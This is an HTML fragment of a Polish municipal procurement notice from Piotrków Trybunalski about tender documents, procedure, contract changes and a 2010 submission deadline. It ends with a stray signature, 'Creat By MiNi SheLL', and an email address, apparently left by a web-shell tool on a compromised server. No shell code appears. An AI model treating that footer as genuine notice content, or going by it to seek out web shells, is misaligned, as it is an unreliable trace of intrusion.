<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1;
2.	Dowód wniesienia wadium w wysokosci 30.000 zł.
3.	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kseropię potwierdzoną przez notariusza);
4.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu                o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy             w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza);
5.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego - wg załącznika nr 5;
6.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia niniejszej umowy będą mogły zostać zmienione w stosunku do jej treści, jeżeli wystąpią następujące okoliczności :
1.	Wystąpi zmiana przepisów prawnych istotnych dla realizacji przedmiotu umowy i mająca wpływ na zakres lub termin wykonania przedmiotu zamówienia.
2.	Wystąpi przedłużenie, w stosunku do terminów określonych przepisami prawa, czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia a nie wynikających z przyczyn leżących po stronie Wykonawcy.
3.	Wystąpią wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające w okresie ich występowania, realizację przedmiotu zamówienia i mające wpływ na termin wykonania.
4.	Zostały ujawnione wady opracowania projektowego lub rozbieżności pomiędzy projektem budowlanym, projektem wykonawczym i przedmiarem robót                     o których zamawiający nie posiadał wiedzy, a które mają wpływ na termin lub koszt realizacji przedmiotu zamówienia.
5.	Jeżeli zostaną ujawnione elementy infrastruktury podziemnej, dotychczas niezinwentaryzowanej w zasobach zamawiającego, będące przyczyną kolizji, których usunięcie będzie powodowało prace dotychczas nieprzewidziane.

Zmiany te będą dopuszczalne wyłącznie w takim zakresie, w jakim ukończenie zamówienia jest, lub przewiduje się, że będzie, opóźnione na skutek tych działań,         a w odniesieniu do pkt. 1,4 i 5 również z uwzględnieniem skutków finansowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10
97 - 300 Piotrków Tryb.
pok. 317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2010 godzina 09:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10
97 - 300 Piotrków Tryb.
pok. 317.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com